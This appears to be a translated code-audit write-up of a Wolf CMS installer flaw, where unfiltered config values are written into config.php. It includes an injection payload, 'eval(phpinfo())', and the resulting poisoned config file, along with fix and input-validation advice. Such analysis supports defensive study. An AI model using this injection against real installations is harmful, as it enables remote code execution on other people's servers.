wolfcms code audit
1. The audit process
The audit also uses active plus passive scanning, which can help you to test some parameters that you have not noticed. Especially in the black box audit process, it is particularly useful. Of course, when the big brother said nothing to me. I am here to tease Xiaobai. Hee hee hee. Similarly, when auditing douphp, the vulnerability exists in the configuration of the installation file, and the installation is not verified, resulting in the new configuration can be written to the configuration file. Although single quotes are used to wrap the parameters, there is no global filtering of the data, resulting in Any command can be executed. If the upgrade is not passed, you can fix the vulnerability by deleting the / wolf / install folder after installation.
2. Vulnerability verification
By looking at the code, we found that it only needs to be closed '), so we construct the payload'); eval (phpinfo ()); //
Incoming parameters to view the results
3. Vulnerability analysis
We check the wolf / install / install.php indes.php do-install.php file for analysis,
Paste the code directly here
<?php
if (isset($_POST['install']) && !isset($_POST['commit']) && file_exists(CFG_FILE) && !(filesize(CFG_FILE) > 1)) {
require_once 'install.php';
}
else if (isset($_POST['install']) && isset($_POST['commit']) && isset($_POST['config'])) {
$config = $_POST['config'];
require_once 'do-install.php';
require_once 'post-install.php';
}
By analyzing the data package, the parameters we pass in are analyzed, and by classification, we enter different modules to complete different functions. We enter do-install.php for analysis, the main code
// Create config.php template
$config_tmpl = new Template('config.tmpl');
$config_tmpl->assign($config);
// Get generated config.php
$config_content = $config_tmpl->fetch();
// Write config.php
if (!file_put_contents(CFG_FILE, $config_content)) {
$error .= "<ul><li><strong>Config file could not be written!</strong></li>\n";
}
config, after processing by the fetch and assign function, we track the two Function
public function assign($name, $value=null) {
if (is_array($name)) {
foreach($name as $n => $v) {
$this->_vars[$n] = $v;
}
} else {
$this->_vars[$name] = $value;
}
}
/**
* Display template and return output as string
*
* @return string content of compiled template
*/
public function fetch() {
ob_start();
if ($this->_includeTemplate()) {
return ob_get_clean();
}
ob_end_clean();
}
Only the key value and key name of the data are processed and divided into the data, and the data is spliced below. After the data is written into the buffer, the splicing is performed and finally taken out.
We can check the real-time parameter values of these parameters through debugging
continue following
Seeing our final parameters, the file_put_contents function was written to the configuration file
Next, check the code below and include our configuration file to trigger the vulnerability and implement command execution. Let's view the configuration file
<?php
// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=');eval(phpinfo());//;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'root');
define('TABLE_PREFIX', '');
It is found that the shell has been successfully written. Of course, we can also construct the previous content to complete the splicing without affecting the connection configuration of the database. The details will not be introduced. Interested students will study under their own area.
4. Summary
There is no systematic audit of this cms. Of course, when auditing, we must pay attention to whether the parameters we need are controllable and can be controlled into the parameters we need. Sometimes, although global filtering of quotation marks is used, there are some There will also be negligence, which causes the user to pass in the variable without being wrapped with single quotes, which leads to the generation of SQL injection. Do n’t believe any parameters entered by the user, and strictly limit the type length of the required parameters, which can effectively prevent the occurrence of vulnerabilities .